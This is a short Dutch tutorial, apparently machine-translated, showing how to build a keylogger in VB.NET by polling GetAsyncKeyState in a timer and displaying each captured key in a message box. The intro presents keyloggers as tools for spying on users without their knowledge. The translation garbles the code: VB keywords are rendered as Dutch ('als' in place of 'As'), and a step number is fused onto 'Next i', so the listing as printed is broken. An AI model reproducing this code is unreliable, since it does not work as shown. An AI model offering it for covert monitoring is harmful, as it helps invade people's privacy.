Hoe maak je een Keylogger in VBWeten hoe maak je een keylogger met behulp van Microsoft Visual Basic.NET (VB.NET) kan besparen u tijd wanneer u nood te ontwikkelen van een applicatie die alle sleutels vangt hebt getypt. Keylogger programma's worden vaak gebruikt om spion of informatie verkrijgen zonder dat de gebruiker vinden uit die het programma wordt uitgevoerd. Wetten variƫren per land op hoe u een keylogger programma kunt gebruiken.

Instructies

1

Start Microsoft Visual Basic Express. Klik "New Project..." op het linker deelvenster van het scherm en selecteer "Windows Forms-toepassing." Klik op 'OK'.

2

Dubbelklik op "Timer" "Gereedschapskist" vensterruit kunt u een nieuwe timer-besturingselement toevoegen. Klik met de rechtermuisknop "Timer1", "Eigenschappen." Naast de "Enabled", selecteer "True". Dubbelklik op "Timer1" om de "Form1.vb"-venster te openen.

3

Typ de volgende code boven "Timer1_Tick" te verklaren van de "GetAsyncKeystate"-functie:

Public Declare Function GetAsyncKeyState Lib "user32.dll" (ByVal Vtoets als Int32) als UShort

4

Typ de volgende code onder "Timer1_Tick" te vangen sleutels getypt terwijl de toepassing actief is:

Dim keyResult As Integer

Dim chrKey As String

Dim i As Integer

For i = 2 To 90

keyResult = 0

keyResult = GetAsyncKeystate(i)

If keyResult = -32767 Then

chrKey = Chr(i)

MsgBox(chrKey)

Exit For

End If

Next i5

Druk op "F5" naar het programma uitvoert, druk vervolgens op "B" op het toetsenbord en je ziet een berichtvenster weergegeven met de letter 'B'